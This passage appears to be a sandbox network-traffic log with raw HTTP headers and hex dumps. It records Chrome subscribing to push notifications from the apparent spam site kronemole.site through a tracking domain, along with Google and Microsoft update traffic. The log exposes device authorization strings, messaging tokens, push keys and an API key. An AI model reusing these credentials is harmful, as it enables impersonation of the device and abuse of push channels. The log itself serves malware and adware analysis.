                                                                          2023-11-21 16:58:48 UTC885OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sRFYfFOdTkn4XB2&MD=7T2tkHb2 HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2023-11-21 16:58:48 UTC902INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                          MS-CorrelationId: 58ff4f76-1b58-48bf-86c6-66ce1a0e3efe
                                                                          MS-RequestId: f367e2b4-62f9-4900-b05f-051cb7811616
                                                                          MS-CV: 2C023RLDx0qay5NE.0
                                                                          X-Microsoft-SLSClientCache: 2880
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Tue, 21 Nov 2023 16:58:47 GMT
                                                                          Connection: close
                                                                          Content-Length: 24490
                                                                          2023-11-21 16:58:48 UTC903INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                          2023-11-21 16:58:48 UTC918INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          47192.168.2.449798172.253.122.1134435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:59:04 UTC927OUTPOST /checkin HTTP/1.1
                                                                          Host: android.clients.google.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 86
                                                                          Content-Type: application/x-protobuf
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: empty
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:59:04 UTC927OUTData Raw: 10 00 1a 2a 31 2d 64 61 33 39 61 33 65 65 35 65 36 62 34 62 30 64 33 32 35 35 62 66 65 66 39 35 36 30 31 38 39 30 61 66 64 38 30 37 30 39 22 18 60 03 6a 14 08 01 12 0e 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 18 01 69 00 00 00 00 00 00 00 00 70 03 b0 01 00
                                                                          Data Ascii: *1-da39a3ee5e6b4b0d3255bfef95601890afd80709"`j117.0.5938.132ip
                                                                          2023-11-21 16:59:04 UTC927INHTTP/1.1 200 OK
                                                                          Content-Type: application/x-protobuffer
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Tue, 21 Nov 2023 16:59:04 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /checkin/_/AndroidCheckinHttp/cspreport
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Accept-Ranges: none
                                                                          Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                          Connection: close
                                                                          Transfer-Encoding: chunked
                                                                          2023-11-21 16:59:04 UTC928INData Raw: 31 66 30 0d 0a 08 01 18 b9 ec c8 96 bf 31 2a 21 0a 0a 61 6e 64 72 6f 69 64 5f 69 64 12 13 35 30 32 37 36 33 32 36 34 35 31 37 33 37 37 31 32 35 37 2a 12 0a 0d 63 68 72 6f 6d 65 5f 64 65 76 69 63 65 12 01 31 2a 14 0a 0e 64 65 76 69 63 65 5f 63 6f 75 6e 74 72 79 12 02 75 73 2a 29 0a 18 64 65 76 69 63 65 5f 72 65 67 69 73 74 72 61 74 69 6f 6e 5f 74 69 6d 65 12 0d 31 37 30 30 35 38 32 34 30 30 30 30 30 39 f9 7b bd d4 40 bd c5 45 41 48 f1 3c f3 fa 8c 09 60 48 00 5a 1f 41 5f 42 53 58 76 52 33 2d 4c 41 61 6f 4c 50 67 4e 37 65 2d 75 44 44 7a 59 69 4d 74 76 78 67 62 b7 02 41
                                                                          Data Ascii: 1f01*!android_id5027632645173771257*chrome_device1*device_countryus*)device_registration_time17005824000009{@EAH<`HZA_BSXvR3-LAaoLPgN7e-uDDzYiMtvxgbA
                                                                          2023-11-21 16:59:04 UTC928INData Raw: 42 46 45 74 31 57 72 78 46 46 56 31 33 67 65 6e 71 37 30 79 69 35 6e 56 70 53 2d 4c 49 37 34 43 4b 76 57 64 7a 55 4a 54 74 49 67 6b 5a 72 65 5a 53 33 45 44 68 6a 73 66 62 39 4b 34 54 38 76 2d 33 6b 4c 49 52 69 48 57 31 55 35 64 65 59 4a 43 4d 51 51 6f 32 63 77 49 66 52 30 4e 68 32 43 42 77 61 36 70 44 33 56 4a 69 36 58 43 6e 71 61 62 33 45 69 39 76 57 39 51 51 6d 67 74 31 73 5f 76 4b 52 39 59 35 42 33 34 63 42 33 52 36 66 37 68 46 30 64 32 62 4d 48 68 55 4e 6b 57 78 41 36 4a 56 32 69 56 65 34 51 74 4c 58 35 38 77 36 32 2d 36 76 4b 37 67 45 74 6c 34 72 4c 70 33 36 42 7a 4e 4c 59 47 5a 44 47 53 54 44 53 5a 6f 31 52 57 6d 4f 31 38 7a 33 36 31 78 45 6c 56 6e 66 32 4e 6d 6a 51 73 6c 64 38 76 6a 4d 76 39 4f 4f 64 76 71 4f 57 45 37 31 53 69 2d 73 54 7a 76 46 71
                                                                          Data Ascii: BFEt1WrxFFV13genq70yi5nVpS-LI74CKvWdzUJTtIgkZreZS3EDhjsfb9K4T8v-3kLIRiHW1U5deYJCMQQo2cwIfR0Nh2CBwa6pD3VJi6XCnqab3Ei9vW9QQmgt1s_vKR9Y5B34cB3R6f7hF0d2bMHhUNkWxA6JV2iVe4QtLX58w62-6vK7gEtl4rLp36BzNLYGZDGSTDSZo1RWmO18z361xElVnf2NmjQsld8vjMv9OOdvqOWE71Si-sTzvFq
                                                                          2023-11-21 16:59:04 UTC929INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          48192.168.2.449799172.253.122.1134435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:59:04 UTC929OUTPOST /c2dm/register3 HTTP/1.1
                                                                          Host: android.clients.google.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 73
                                                                          Authorization: AidLogin 5027632645173771257:6920217311882047816
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: empty
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:59:04 UTC929OUTData Raw: 61 70 70 3d 63 6f 6d 2e 67 6f 6f 67 6c 65 2e 61 6e 64 72 6f 69 64 2e 67 6d 73 26 64 65 76 69 63 65 3d 35 30 32 37 36 33 32 36 34 35 31 37 33 37 37 31 32 35 37 26 73 65 6e 64 65 72 3d 37 34 35 34 37 36 31 37 37 36 32 39
                                                                          Data Ascii: app=com.google.android.gms&device=5027632645173771257&sender=745476177629
                                                                          2023-11-21 16:59:05 UTC930INHTTP/1.1 200 OK
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Date: Tue, 21 Nov 2023 16:59:05 GMT
                                                                          Expires: Tue, 21 Nov 2023 16:59:05 GMT
                                                                          Cache-Control: private, max-age=0
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Content-Security-Policy: frame-ancestors 'self'
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Server: GSE
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Accept-Ranges: none
                                                                          Vary: Accept-Encoding
                                                                          Connection: close
                                                                          Transfer-Encoding: chunked
                                                                          2023-11-21 16:59:05 UTC930INData Raw: 39 32 0d 0a 74 6f 6b 65 6e 3d 41 50 41 39 31 62 45 55 48 6a 43 73 78 53 75 6c 4a 66 68 76 32 61 50 59 67 4a 31 55 5f 6f 39 43 43 66 37 36 52 51 61 2d 66 78 76 35 33 53 77 64 57 35 33 77 79 51 64 4d 6e 52 6e 42 35 74 62 34 38 57 44 44 63 31 6e 72 6f 4d 68 68 53 4d 38 46 6e 50 4e 31 56 32 6f 68 2d 42 4b 7a 39 75 63 55 71 6e 31 31 77 5a 32 39 30 76 70 4b 57 41 6a 41 4d 6f 7a 7a 72 39 34 63 34 71 5a 61 44 6a 48 4d 58 6b 71 52 46 79 41 73 4c 42 4b 4a 0d 0a
                                                                          Data Ascii: 92token=APA91bEUHjCsxSulJfhv2aPYgJ1U_o9CCf76RQa-fxv53SwdW53wyQdMnRnB5tb48WDDc1nroMhhSM8FnPN1V2oh-BKz9ucUqn11wZ290vpKWAjAMozzr94c4qZaDjHMXkqRFyAsLBKJ
                                                                          2023-11-21 16:59:05 UTC930INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          49192.168.2.449800172.253.122.1134435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:59:04 UTC929OUTPOST /c2dm/register3 HTTP/1.1
                                                                          Host: android.clients.google.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 269
                                                                          Authorization: AidLogin 5027632645173771257:6920217311882047816
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: empty
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:59:04 UTC930OUTData Raw: 61 70 70 3d 63 6f 6d 2e 63 68 72 6f 6d 65 2e 77 69 6e 64 6f 77 73 26 58 2d 73 75 62 74 79 70 65 3d 77 70 3a 68 74 74 70 73 3a 2f 2f 6b 72 6f 6e 65 6d 6f 6c 65 2e 73 69 74 65 2f 25 32 33 36 30 38 36 39 30 46 43 2d 46 45 38 46 2d 34 42 33 38 2d 38 44 31 35 2d 45 45 44 46 37 44 44 43 45 2d 56 32 26 64 65 76 69 63 65 3d 35 30 32 37 36 33 32 36 34 35 31 37 33 37 37 31 32 35 37 26 73 63 6f 70 65 3d 47 43 4d 26 58 2d 73 63 6f 70 65 3d 47 43 4d 26 67 6d 73 76 3d 31 31 37 26 61 70 70 69 64 3d 63 47 65 4f 31 4a 78 62 71 31 30 26 73 65 6e 64 65 72 3d 42 4a 62 75 6a 74 4b 49 6d 6b 69 4c 57 6a 6c 57 6b 4d 47 59 4d 6f 32 5f 73 4d 30 61 6c 32 34 4b 6f 53 37 55 36 54 4a 31 55 37 73 4b 4a 61 78 6c 49 55 4c 7a 35 73 36 70 37 74 4e 36 57 62 6e 4c 69 73 43 71 5f 53 69 35 68
                                                                          Data Ascii: app=com.chrome.windows&X-subtype=wp:https://kronemole.site/%23608690FC-FE8F-4B38-8D15-EEDF7DDCE-V2&device=5027632645173771257&scope=GCM&X-scope=GCM&gmsv=117&appid=cGeO1Jxbq10&sender=BJbujtKImkiLWjlWkMGYMo2_sM0al24KoS7U6TJ1U7sKJaxlIULz5s6p7tN6WbnLisCq_Si5h
                                                                          2023-11-21 16:59:05 UTC930INHTTP/1.1 200 OK
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Date: Tue, 21 Nov 2023 16:59:05 GMT
                                                                          Expires: Tue, 21 Nov 2023 16:59:05 GMT
                                                                          Cache-Control: private, max-age=0
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Content-Security-Policy: frame-ancestors 'self'
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Server: GSE
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Accept-Ranges: none
                                                                          Vary: Accept-Encoding
                                                                          Connection: close
                                                                          Transfer-Encoding: chunked
                                                                          2023-11-21 16:59:05 UTC931INData Raw: 39 65 0d 0a 74 6f 6b 65 6e 3d 63 47 65 4f 31 4a 78 62 71 31 30 3a 41 50 41 39 31 62 46 6a 33 6c 5f 6c 63 46 75 56 79 35 6a 2d 61 77 76 56 72 62 79 53 71 4f 45 56 6a 77 71 59 77 48 4e 35 6e 30 78 4b 44 6c 51 62 31 71 52 43 57 32 6c 4b 33 5f 34 32 6c 77 73 58 79 68 4e 73 4b 38 6f 48 55 41 5f 46 6f 74 7a 4f 37 5a 48 65 78 31 58 37 4d 43 65 4b 62 32 46 55 50 4a 72 73 46 6e 49 30 55 69 45 61 68 68 65 6b 7a 49 59 37 70 4d 6d 43 77 63 36 6e 77 49 7a 46 32 76 48 6b 55 79 4d 5f 6e 6b 47 49 0d 0a
                                                                          Data Ascii: 9etoken=cGeO1Jxbq10:APA91bFj3l_lcFuVy5j-awvVrbySqOEVjwqYwHN5n0xKDlQb1qRCW2lK3_42lwsXyhNsK8oHUA_FotzO7ZHex1X7MCeKb2FUPJrsFnI0UiEahhekzIY7pMmCwc6nwIzF2vHkUyM_nkGI
                                                                          2023-11-21 16:59:05 UTC931INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          50192.168.2.449803172.67.173.334435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:59:06 UTC931OUTOPTIONS /register/push/v9e118mez8 HTTP/1.1
                                                                          Host: subscription.trk-essursta.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          Origin: https://kronemole.site
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://kronemole.site/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:59:06 UTC932INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:59:06 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          expires: 0
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          access-control-allow-headers: content-type
                                                                          x-xss-protection: 1; mode=block
                                                                          pragma: no-cache
                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                          content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                                                                          access-control-allow-methods: POST
                                                                          x-frame-options: SAMEORIGIN
                                                                          access-control-expose-headers: Authorization, Link, X-Total-Count, X-pushPlatformApp-alert, X-pushPlatformApp-error, X-pushPlatformApp-params
                                                                          access-control-allow-origin: *
                                                                          vary: Origin
                                                                          vary: Access-Control-Request-Method
                                                                          vary: Access-Control-Request-Headers
                                                                          x-content-type-options: nosniff
                                                                          permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                                                                          access-control-max-age: 1800
                                                                          CF-Cache-Status: DYNAMIC
                                                                          2023-11-21 16:59:06 UTC933INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 59 25 32 46 42 6a 72 46 52 36 78 4f 6b 53 78 44 44 30 50 34 70 77 73 54 6a 56 46 4f 69 6a 49 73 50 78 52 54 4c 68 41 6b 54 25 32 46 66 25 32 46 71 6b 51 49 76 30 4e 4f 66 42 25 32 42 78 45 25 32 46 4e 6a 59 79 4b 53 30 58 37 4e 54 56 50 44 76 6c 25 32 42 76 42 66 74 59 76 4d 70 76 38 6b 64 65 56 77 37 75 50 65 54 59 77 30 4b 5a 41 62 4f 53 42 74 36 50 69 68 43 62 55 6b 33 66 67 6c 57 72 31 51 30 75 54 63 44 41 69 38 41 35 51 25 32 46 39 43 4a 6f 53 48 6f 64 4d 53 51 33 47 77 77 5a 43 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72
                                                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y%2FBjrFR6xOkSxDD0P4pwsTjVFOijIsPxRTLhAkT%2Ff%2FqkQIv0NOfB%2BxE%2FNjYyKS0X7NTVPDvl%2BvBftYvMpv8kdeVw7uPeTYw0KZAbOSBt6PihCbUk3fglWr1Q0uTcDAi8A5Q%2F9CJoSHodMSQ3GwwZCA%3D%3D"}],"gr


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          51192.168.2.449804172.67.173.334435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:59:06 UTC933OUTPOST /register/push/v9e118mez8 HTTP/1.1
                                                                          Host: subscription.trk-essursta.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 502
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Content-type: application/json
                                                                          Accept: */*
                                                                          Origin: https://kronemole.site
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://kronemole.site/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:59:06 UTC934OUTData Raw: 7b 22 65 6e 64 70 6f 69 6e 74 22 3a 22 68 74 74 70 73 3a 2f 2f 66 63 6d 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 66 63 6d 2f 73 65 6e 64 2f 63 47 65 4f 31 4a 78 62 71 31 30 3a 41 50 41 39 31 62 46 6a 33 6c 5f 6c 63 46 75 56 79 35 6a 2d 61 77 76 56 72 62 79 53 71 4f 45 56 6a 77 71 59 77 48 4e 35 6e 30 78 4b 44 6c 51 62 31 71 52 43 57 32 6c 4b 33 5f 34 32 6c 77 73 58 79 68 4e 73 4b 38 6f 48 55 41 5f 46 6f 74 7a 4f 37 5a 48 65 78 31 58 37 4d 43 65 4b 62 32 46 55 50 4a 72 73 46 6e 49 30 55 69 45 61 68 68 65 6b 7a 49 59 37 70 4d 6d 43 77 63 36 6e 77 49 7a 46 32 76 48 6b 55 79 4d 5f 6e 6b 47 49 22 2c 22 65 78 70 69 72 61 74 69 6f 6e 54 69 6d 65 22 3a 6e 75 6c 6c 2c 22 6b 65 79 73 22 3a 7b 22 70 32 35 36 64 68 22 3a 22 42 41 33 6d 6c 54 6e 78 7a 4a 37 39
                                                                          Data Ascii: {"endpoint":"https://fcm.googleapis.com/fcm/send/cGeO1Jxbq10:APA91bFj3l_lcFuVy5j-awvVrbySqOEVjwqYwHN5n0xKDlQb1qRCW2lK3_42lwsXyhNsK8oHUA_FotzO7ZHex1X7MCeKb2FUPJrsFnI0UiEahhekzIY7pMmCwc6nwIzF2vHkUyM_nkGI","expirationTime":null,"keys":{"p256dh":"BA3mlTnxzJ79
                                                                          2023-11-21 16:59:06 UTC934INHTTP/1.1 201 Created
                                                                          Date: Tue, 21 Nov 2023 16:59:06 GMT
                                                                          Content-Type: application/json
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          expires: 0
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          x-xss-protection: 1; mode=block
                                                                          pragma: no-cache
                                                                          location: /register/push357765986
                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                          x-pushplatformapp-params: 357765986
                                                                          content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                                                                          x-pushplatformapp-alert: pushPlatformApp.pushSubscription.created
                                                                          x-frame-options: SAMEORIGIN
                                                                          access-control-expose-headers: Authorization, Link, X-Total-Count, X-pushPlatformApp-alert, X-pushPlatformApp-error, X-pushPlatformApp-params
                                                                          access-control-allow-origin: *
                                                                          vary: Origin
                                                                          vary: Access-Control-Request-Method
                                                                          vary: Access-Control-Request-Headers
                                                                          x-content-type-options: nosniff
                                                                          permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                                                                          CF-Cache-Status: DYNAMIC
                                                                          2023-11-21 16:59:06 UTC936INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 39 6c 56 68 4a 30 37 6a 54 50 6b 75 7a 25 32 46 62 4a 75 37 4e 61 6f 52 44 31 6b 42 6a 38 68 54 73 37 71 58 53 47 57 4d 4e 4f 41 36 4b 36 52 4c 70 39 35 55 44 67 6b 70 36 74 25 32 42 25 32 42 77 7a 66 78 73 35 67 62 45 73 74 37 44 35 56 59 42 72 58 6a 53 44 75 4f 58 54 6f 61 54 43 37 6c 72 54 53 33 79 57 6e 25 32 42 37 6a 6b 71 49 66 35 74 4d 79 36 44 4f 37 59 46 64 42 38 25 32 42 31 4f 54 6f 49 78 54 43 59 6b 75 4b 55 4f 77 46 34 42 52 41 73 52 33 5a 74 6d 38 25 32 42 64 51 71 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75
                                                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9lVhJ07jTPkuz%2FbJu7NaoRD1kBj8hTs7qXSGWMNOA6K6RLp95UDgkp6t%2B%2Bwzfxs5gbEst7D5VYBrXjSDuOXToaTC7lrTS3yWn%2B7jkqIf5tMy6DO7YFdB8%2B1OToIxTCYkuKUOwF4BRAsR3Ztm8%2BdQqg%3D%3D"}],"grou
                                                                          2023-11-21 16:59:06 UTC936INData Raw: 32 63 30 0d 0a 7b 22 65 6e 64 70 6f 69 6e 74 22 3a 22 68 74 74 70 73 3a 2f 2f 66 63 6d 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 66 63 6d 2f 73 65 6e 64 2f 63 47 65 4f 31 4a 78 62 71 31 30 3a 41 50 41 39 31 62 46 6a 33 6c 5f 6c 63 46 75 56 79 35 6a 2d 61 77 76 56 72 62 79 53 71 4f 45 56 6a 77 71 59 77 48 4e 35 6e 30 78 4b 44 6c 51 62 31 71 52 43 57 32 6c 4b 33 5f 34 32 6c 77 73 58 79 68 4e 73 4b 38 6f 48 55 41 5f 46 6f 74 7a 4f 37 5a 48 65 78 31 58 37 4d 43 65 4b 62 32 46 55 50 4a 72 73 46 6e 49 30 55 69 45 61 68 68 65 6b 7a 49 59 37 70 4d 6d 43 77 63 36 6e 77 49 7a 46 32 76 48 6b 55 79 4d 5f 6e 6b 47 49 22 2c 22 65 78 70 69 72 61 74 69 6f 6e 54 69 6d 65 22 3a 6e 75 6c 6c 2c 22 6b 65 79 73 22 3a 7b 22 61 75 74 68 22 3a 22 33 56 30 34 68 5f 39 4c 36
                                                                          Data Ascii: 2c0{"endpoint":"https://fcm.googleapis.com/fcm/send/cGeO1Jxbq10:APA91bFj3l_lcFuVy5j-awvVrbySqOEVjwqYwHN5n0xKDlQb1qRCW2lK3_42lwsXyhNsK8oHUA_FotzO7ZHex1X7MCeKb2FUPJrsFnI0UiEahhekzIY7pMmCwc6nwIzF2vHkUyM_nkGI","expirationTime":null,"keys":{"auth":"3V04h_9L6
                                                                          2023-11-21 16:59:06 UTC937INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          52192.168.2.449805151.101.129.444435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:59:07 UTC937OUTGET /2.0/json/smpush-general/user.sync?app.type=web&app.apikey=dd83e155339c3c4626a1a3e8465b50db3024b412 HTTP/1.1
                                                                          Host: api.taboola.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
